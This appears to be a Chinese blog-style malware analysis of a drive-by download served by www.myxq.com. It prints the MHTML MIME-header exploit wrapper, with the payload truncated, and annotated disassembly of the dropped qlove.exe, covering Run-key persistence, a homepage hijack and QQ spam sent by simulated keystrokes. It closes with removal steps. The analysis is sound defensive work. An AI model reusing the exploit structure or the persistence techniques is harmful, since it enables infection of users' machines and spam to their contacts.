| 关键词: push dword ptr eax Reference 00000000 Call StringData Possible mov |
某日上网,正在查看QQ上好友的信息,突然发觉QQ自动发了一个信息出去,我大吃一惊,难道是大名鼎鼎的"中国黑客"出新版本了?不过不可能啊,“中国黑客”偶认为是一个标准的概念病毒,因为它没有打开破坏的功能接口,仅仅是展示了其创新的想法,何况中国黑客的QQ功能仅仅是向发送窗口输入爱国口号,没有发送的功能。一些疑虑顿上心头。经过发现,发现www.myxq.com这个网站出的问题最大,打开一看,又吓了一跳,然后是各种XXX灰飞烟灭,果然你的问题最大。还是先改该IE的设置吧,将所有的AXTIVE,脚本,等你觉得不顺眼的都关闭,再打开页面,然后看看原代码,还不到1秒钟,IFRAME就向我招手了,我看到既兴奋有害怕。在IFRAME包含的.mnt的到底是什么东西啊,还得看个究竟。该站网页内含有而默认的IE安全级别是自动运行的。这样就被下载到用户的机器中,而分析这个MHT后缀的MHTML Document网页文档到底是什么呢,一看才知道原来是利用了错误的MIME头漏洞,偶的机器什么补丁也没打,最佳的蜜陷,自己就是IDS,对了,就这样轻松的让她进来了。还是看看她的庐山真面目吧:------------------------snap----------------------------------Content-Type: multipart/related;type="multipart/alternative";boundary="====B===="--====B====Content-Type: multipart/alternative;boundary="====A===="--====A====Content-Type: text/html;Content-Transfer-Encoding: quoted-printable--====A====----====B====Content-Type: audio/x-wav;name="qlove.exe"Content-Transfer-Encoding: base64Content-ID: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA。。。省略AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==--====B====----------------snap---------------------------------果真没错,那么熟悉。那么我的机器里面应该有可爱的qlove.exe这个文件了吧,搜索一下,找到了哈,看看大小,恩,应该是汇编写的吧,不放心,拿FI.exe照妖镜一看,啊,原来是VC啊,太没有创意了吧,这年头,还有人用VC来写这种东西,再次嘛,也要用什么delphi啊,是吧?也好,至少不是用汇编写的,那样也就少了什么花指令,什么迷惑我的东西,VC写的,呵呵,VC写的,任何反汇编都能吃了你。于是操起已经尘封多月的W32Dasm,什么你说太老土,大家都用ida了?我晕,其实偶用的动态调试工具中没有SOFTICE,也没有TRW2000 ,最爱用的是TRV2.52,哈够老土了吧。言归正传,还是应该反反看,到底是些什么功能。于是又牺牲了我1个小时的PK时间,来做这个地球人都不愿意做的事情。经过分析,发现这个未请自来的程序,不好叫别人病毒吧,别人又不是生下来就在身上写了病毒两个大字,一下批倒了,还是给别人改过自新的机会吧,叫QLOVE它本名字吧。虽然他在我眼里不是病毒,不过他的手段基本和病毒差不多,仍然有感染部分,传播部分,和自身的保护部分,下面先给出反汇编的主要功能模块。运行后会自动更改WIN.INI,并将自身以WebAuto的名字拷贝到系统目录下,改动那个地球人都知道的注册表地方,让系统启动后自动运行。并且通过注册表的改动,让IE的默认页面自动为www.myxq.com。同时由下面的汇编代码也就清楚了初始的疑惑,为什么QQ会自动的发消息,还是利用了USER32.DLL中的keybd_event这个API函数,当然还得感谢QQ的快捷键,成就了她通过自动发QQ广告宣传她的站点作用,一旦,你看到这个广告,主页上的代码就运行到你的机器上了,然后就是继续的为其服务,宣传广告,即使你打了补丁,你的好友老是给你发这个消息,你烦不烦啊。反汇编分析部分运行部分* Possible StringData Ref from Data Obj ->"WebAuto"|:00401081 6820304000 push 00403020:00401086 6A01 push 00000001:00401088 57 push edi:00401089 FF1518204000 Call dword ptr [00402018] ;建立互斥体"WebAuto":0040108F 85C0 test eax, eax ;判断内存是否已经运行了:00401091 746C je 004010FF ;若有则跳到结束* Reference To: KERNEL32.GetLastError, Ord:011Ah|:00401093 FF1510204000 Call dword ptr [00402010] ;获得错误信息:00401099 3DB7000000 cmp eax, 000000B7 ;错误则跳到结束:0040109E 745F je 004010FF* Reference To: KERNEL32.Sleep, Ord:0296h|:004010A0 8B3514204000 mov esi, dword ptr [00402014] * Referenced by a (U)nconditional or (C)onditional Jump at Address:|:004010FD(U)|:004010A6 A14C324000 mov eax, dword ptr [0040324C]:004010AB 40 inc eax:004010AC 83F828 cmp eax, 00000028:004010AF A34C324000 mov dword ptr [0040324C], eax:004010B4 7E0B jle 004010C1 ;跳到运行:004010B6 893D4C324000 mov dword ptr [0040324C], edi:004010BC E89F050000 call 00401660 ;休眠* Referenced by a (U)nconditional or (C)onditional Jump at Address:|:004010B4(C)|:004010C1 E8DA000000 call 004011A0:004010FF 5F pop edi ;恢复堆栈寄存器:00401100 5E pop esi:00401101 B801000000 mov eax, 00000001:00401106 5B pop ebx:00401107 C21000 ret 0010 ;返回感染部分将拷贝到系统目录并修改WIN.INI和注册表中* Reference To: KERNEL32.GetSystemDirectoryA, Ord:0159h|:004011D0 FF151C204000 Call dword ptr [0040201C] ;得到系统目录:004011D6 B940000000 mov ecx, 00000040:004011DB 33C0 xor eax, eax:004011DD 8D7C2410 lea edi, dword ptr [esp+10]* Possible StringData Ref from Data Obj ->"WebAuto.exe"|:004011E1 6880304000 push 00403080:004011E6 F3 repz:004011E7 AB stosd:004011E8 8D842414010000 lea eax, dword ptr [esp+00000114]:004011EF 8D4C2414 lea ecx, dword ptr [esp+14]:004011F3 50 push eax* Possible StringData Ref from Data Obj ->"%s\%s"|:004011F4 6878304000 push 00403078:004011F9 51 push ecx* Reference To: MSVCRT.sprintf, Ord:02B2h|:004011FA FF15CC204000 Call dword ptr [004020CC]:00401200 83C410 add esp, 00000010:00401203 8D542410 lea edx, dword ptr [esp+10]:00401207 8D842410020000 lea eax, dword ptr [esp+00000210]:0040120E 6A00 push 00000000:00401210 52 push edx:00401211 50 push eax* Reference To: KERNEL32.CopyFileA, Ord:0028h |:00401212 FF1520204000 Call dword ptr [00402020] ;拷贝文件qlove到系统目录;并改名WebAuto.exe;修改注册表,使得程序随WINDOWS启动,自动运行WebAuto.exe。;并修改IE默认的启动页面http://www.myxq.com* Reference To: ADVAPI32.RegOpenKeyA, Ord:0171h|:00401218 8B1D04204000 mov ebx, dword ptr [00402004]:0040121E 8D4C240C lea ecx, dword ptr [esp+0C]:00401222 51 push ecx* Possible StringData Ref from Data Obj ->"SOFTWARE\Microsoft\Windows\CurrentVersion\Run"|:00401223 6848304000 push 00403048:00401228 6802000080 push 80000002:0040122D FFD3 call ebx ;打开RUN键下内容WebAuto.exe:0040122F 85C0 test eax, eax:00401231 740C je 0040123F ;如果不存在该键,跳到0040123F :00401233 5F pop edi:00401234 5E pop esi:00401235 33C0 xor eax, eax:00401237 5B pop ebx:00401238 81C404030000 add esp, 00000304:0040123E C3 ret:0040123F 8B44240C mov eax, dword ptr [esp+0C]* Reference To: ADVAPI32.RegSetValueExA, Ord:0186h|:00401243 8B3500204000 mov esi, dword ptr [00402000]:00401249 8D542410 lea edx, dword ptr [esp+10]:0040124D 6800010000 push 00000100:00401252 52 push edx:00401253 6A01 push 00000001:00401255 6A00 push 00000000* Possible StringData Ref from Data Obj ->"WebAuto.exe"|:00401257 6880304000 push 00403080:0040125C 50 push eax:0040125D FFD6 call esi ;设置键WebAuto.exe:0040125F 8B4C240C mov ecx, dword ptr [esp+0C]* Reference To: ADVAPI32.RegCloseKey, Ord:015Bh|:00401263 8B3D08204000 mov edi, dword ptr [00402008]:00401269 51 push ecx:0040126A FFD7 call edi ;关闭该键:0040126C 8D54240C lea edx, dword ptr [esp+0C]:00401270 52 push edx* Possible StringData Ref from Data Obj ->"SOFTWARE\Microsoft\Windows\CurrentVersion\Run"|:00401271 6848304000 push 00403048:00401276 6801000080 push 80000001:0040127B FFD3 call ebx ;重新打开该键:0040127D 85C0 test eax, eax:0040127F 740C je 0040128D ;存在,则跳到0040128D :00401281 5F pop edi:00401282 5E pop esi:00401283 33C0 xor eax, eax:00401285 5B pop ebx:00401286 81C404030000 add esp, 00000304:0040128C C3 ret* Referenced by a (U)nconditional or (C)onditional Jump at Address:|:0040127F(C)|:0040128D 8B4C240C mov ecx, dword ptr [esp+0C]:00401291 8D442410 lea eax, dword ptr [esp+10]:00401295 6800010000 push 00000100:0040129A 50 push eax:0040129B 6A01 push 00000001:0040129D 6A00 push 00000000* Possible StringData Ref from Data Obj ->"WebAuto.exe"|:0040129F 6880304000 push 00403080:004012A4 51 push ecx:004012A5 FFD6 call esi ;设置键值WebAto.exe:004012A7 8B54240C mov edx, dword ptr [esp+0C]:004012AB 52 push edx:004012AC FFD7 call edi ;关闭该键:004012AE 5F pop edi:004012AF 5E pop esi:004012B0 B801000000 mov eax, 00000001:004012B5 5B pop ebx:004012B6 81C404030000 add esp, 00000304:004012BC C3 ret:004013A5 8D4C2408 lea ecx, dword ptr [esp+08]:004013A9 51 push ecx* Possible StringData Ref from Data Obj ->"Software\Microsoft\Internet Explorer\Main"|:004013AA 6898304000 push 00403098:004013AF 6801000080 push 80000001* Reference To: ADVAPI32.RegOpenKeyA, Ord:0171h|:004013B4 FF1504204000 Call dword ptr [00402004] ;打开Software\Microsoft\Internet ;Explorer\Main:004013BA 5F pop edi :004013BB 5E pop esi:004013BC 85C0 test eax, eax:004013BE 742E je 004013EE ;如果不存在,跳到4013EE.* Referenced by a (U)nconditional or (C)onditional Jump at Address:|:004013BE(C)|:004013EE 8B442400 mov eax, dword ptr [esp]:004013F2 8D542404 lea edx, dword ptr [esp+04]:004013F6 6800010000 push 00000100:004013FB 52 push edx:004013FC 6A01 push 00000001:004013FE 6A00 push 00000000* Possible StringData Ref from Data Obj ->"Start Page" |:00401400 688C304000 push 0040308C:00401405 50 push eax* Reference To: ADVAPI32.RegSetValueExA, Ord:0186h|:00401406 FF1500204000 Call dword ptr [00402000] ;设置默认启动IE页Start Page:0040140C 8B4C2400 mov ecx, dword ptr [esp] ;键值为www.myxq.com:00401410 51 push ecx* Reference To: ADVAPI32.RegCloseKey, Ord:015Bh|:00401411 FF1508204000 Call dword ptr [00402008] ;关闭键值;以下为更改WIN.ini部分;运行EXEAuto.exe* Possible StringData Ref from Data Obj ->"CurTime"|:00401691 6810324000 push 00403210* Possible StringData Ref from Data Obj ->"AutoTime"|:00401696 6804324000 push 00403204:0040169B 894DD8 mov dword ptr [ebp-28], ecx* Reference To: KERNEL32.GetProfileIntA, Ord:0147h|:0040169E FF1528204000 Call dword ptr [00402028];取得win.ini初;始化文件中指定条目的一个整数值:00401717 8D95B4FDFFFF lea edx, dword ptr [ebp+FFFFFDB4]:0040171D 6800010000 push 00000100:00401722 52 push edx* Reference To: KERNEL32.GetSystemDirectoryA, Ord:0159h|:00401723 FF151C204000 Call dword ptr [0040201C] ;获得系统目录:00401729 B940000000 mov ecx, 00000040:0040172E 33C0 xor eax, eax:00401730 8DBDB4FEFFFF lea edi, dword ptr [ebp+FFFFFEB4]* Possible StringData Ref from Data Obj ->"EXEAuto.exe"|:00401736 68C0314000 push 004031C0:0040173B F3 repz:0040173C AB stosd:0040173D 8D85B4FDFFFF lea eax, dword ptr [ebp+FFFFFDB4]:00401743 8D8DB4FEFFFF lea ecx, dword ptr [ebp+FFFFFEB4]:00401749 50 push eax* Possible StringData Ref from Data Obj ->"%s\%s"|:0040174A 6878304000 push 00403078:0040174F 51 push ecx* Reference To: MSVCRT.sprintf, Ord:02B2h|:00401750 FF15CC204000 Call dword ptr [004020CC]* Possible StringData Ref from Data Obj ->"CurTime"|:004018D6 6810324000 push 00403210* Possible StringData Ref from Data Obj ->"AutoTime"|:004018DB 6804324000 push 00403204* Reference To: KERNEL32.WriteProfileStringA, Ord:02EDh|:004018E0 FF1524204000 Call dword ptr [00402024] ;在Win.ini初始化;文件指定小节内设置一个字串:004018E6 6A00 push 00000000:004018E8 6A00 push 00000000 :004018EA 8D85B4FEFFFF lea eax, dword ptr [ebp+FFFFFEB4]:004018F0 6A00 push 00000000:004018F2 50 push eax ;通过关联程序运行:004018F3 6A00 push 00000000:004018F5 6A00 push 00000000* Reference To: SHELL32.ShellExecuteA, Ord:0072h|:004018F7 FF15E4204000 Call dword ptr [004020E4] ;执行关联程序传播部分通过QQ的发送消息,达到宣传:00401052 33FF xor edi, edi:00401054 C7055032400060EA0000 mov dword ptr [00403250], 0000EA60:0040105E 8B442410 mov eax, dword ptr [esp+10]:00401062 57 push edi:00401063 893D4C324000 mov dword ptr [0040324C], edi:00401069 893D48324000 mov dword ptr [00403248], edi:0040106F A340324000 mov dword ptr [00403240], eax* Reference To: USER32.GetActiveWindow, Ord:00DDh ;获得活动窗口的句柄|:00401074 FF15F4204000 Call dword ptr [004020F4]:0040107A 50 push eax* Reference To: USER32.ShowWindow, Ord:026Ah ;控制窗口的可见性|:0040107B FF15F8204000 Call dword ptr [004020F8]:00401468 53 push ebx* Reference To: USER32.FindWindowExA, Ord:00D6h|:00401469 8B1DFC204000 mov ebx, dword ptr [004020FC]:0040146F 56 push esi:00401470 57 push edi* Possible StringData Ref from Data Obj ->"发送消息"|:00401471 6880314000 push 00403180:00401476 6A00 push 00000000:00401478 6A00 push 00000000:0040147A 6A00 push 00000000:0040147C FFD3 call ebx ;查找QQ的“发送消息”窗口句柄:0040147E 8BF0 mov esi, eax:00401480 85F6 test esi, esi:00401482 751C jne 004014A0 ;找到则跳转到004014A0:00401484 C70550324000F4010000 mov dword ptr [00403250], 000001F4:0040148E 8B4C2420 mov ecx, dword ptr [esp+20]:00401492 64890D00000000 mov dword ptr fs:[00000000], ecx:00401499 5F pop edi:0040149A 5E pop esi:0040149B 5B pop ebx:0040149C 83C420 add esp, 00000020:0040149F C3 ret* Referenced by a (U)nconditional or (C)onditional Jump at Address:|:00401482(C)|:004014A0 6A00 push 00000000* Possible StringData Ref from Data Obj ->"RICHEDIT"|:004014A2 6874314000 push 00403174:004014A7 6A00 push 00000000:004014A9 56 push esi:004014AA FFD3 call ebx ;查找QQ的编辑RICHEDIT类窗口句柄:004014AC 8BF8 mov edi, eax:004014AE 85FF test edi, edi:004014B0 7512 jne 004014C4 ;找到,跳004014C4 :004014B2 8B4C2420 mov ecx, dword ptr [esp+20]:004014B6 64890D00000000 mov dword ptr fs:[00000000], ecx:004014BD 5F pop edi:004014BE 5E pop esi:004014BF 5B pop ebx:004014C0 83C420 add esp, 00000020:004014C3 C3 ret* Possible StringData Ref from Data Obj ->"送讯息(&S)"|:004014C4 6868314000 push 00403168* Possible StringData Ref from Data Obj ->"BUTTON"|:004014C9 6860314000 push 00403160:004014CE 6A00 push 00000000:004014D0 56 push esi:004014D1 FFD3 call ebx ;查找QQ的送讯息按钮的句柄:004014D3 85C0 test eax, eax:004014D5 7512 jne 004014E9:004014D7 8B4C2420 mov ecx, dword ptr [esp+20]:004014DB 64890D00000000 mov dword ptr fs:[00000000], ecx:004014E2 5F pop edi:004014E3 5E pop esi:004014E4 5B pop ebx:004014E5 83C420 add esp, 00000020:004014E8 C3 ret* Referenced by a (U)nconditional or (C)onditional Jump at Address:|:004014D5(C)|:004014E9 8D4C2410 lea ecx, dword ptr [esp+10]:004015C1 50 push eax ; lParam:004015C2 6A00 push 00000000 ; wParam:004015C4 6A0C push 0000000C ; 消息的标识符 :004015C6 57 push edi ; 要接收消息的那个窗口的句柄 * Reference To: USER32.SendMessageA, Ord:0214h|:004015C7 FF15F0204000 Call dword ptr [004020F0] ;发送消息:004015CD 56 push esi* Reference To: USER32.SetForegroundWindow, Ord:0230h|:004015CE FF15EC204000 Call dword ptr [004020EC] ;将窗口设为系统的前台窗口* Reference To: USER32.keybd_event, Ord:02AAh |:004015D4 8B3500214000 mov esi, dword ptr [00402100]:004015DA 6A00 push 00000000 ;dwExtraInfo:004015DC 6A01 push 00000001 ;dwFlags,1代表扩展键:004015DE 6A45 push 00000045 ;bScan 键的OEM扫描码:004015E0 6A11 push 00000011 ;bVk 虚拟键码,模拟CONTROL键:004015E2 FFD6 call esi ;模拟了键盘行动:004015E4 6A00 push 00000000:004015E6 6A01 push 00000001:004015E8 6A45 push 00000045:004015EA 6A0D push 0000000D ;RETURN回车键盘:004015EC FFD6 call esi ;模拟了键盘行动:004015EE 6A00 push 00000000:004015F0 6A03 push 00000003:004015F2 6A45 push 00000045:004015F4 6A11 push 00000011 ;模拟CONTROL键:004015F6 FFD6 call esi ;模拟了键盘行动:004015F8 6A00 push 00000000:004015FA 6A03 push 00000003:004015FC 6A45 push 00000045:004015FE 6A0D push 0000000D ;RETURN回车键盘:00401600 FFD6 call esi ;模拟了键盘行动;上面这一系列的键盘模拟无非是QQ的发送快捷键(ctrl+回车)到了这里了也应该知道如何防范了吧。该打补丁的就打补丁,不幸感染了的就删除你注册表中多余的垃圾吧,同时象偶这样不喜欢打补丁的人,就打开IE,选择工具->INTERNET选项->安全->自定义级别-》在IFRAME中加载程序和文件->选择禁用,就可以了。删除垃圾:删除MYXQWebAuto.mht,qlove.exe和系统目录下的WebAuto.exe程序HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run中清除WebAuto.exe键HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run中清除WebAuto.exe键HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main中清除Start Page的键值HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main中清除Start Page的键值注意需要先将WebAuto.exe程序杀掉,直接在任务栏就可以杀掉,这也是我说这个算不上病毒的原因,因为作者没有注册为服务,隐藏进程,也没有象“中国黑客”那样3线程保护,不过不知道这个程序会不会我这样一说以后升级,增加了这些功能,哈,就不是我的事情了。文章属性:原创文章来源http://superlinux.yeah.net文章提交:linuxh4cker (linuxh4cker_at_yahoo.com.cn) |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|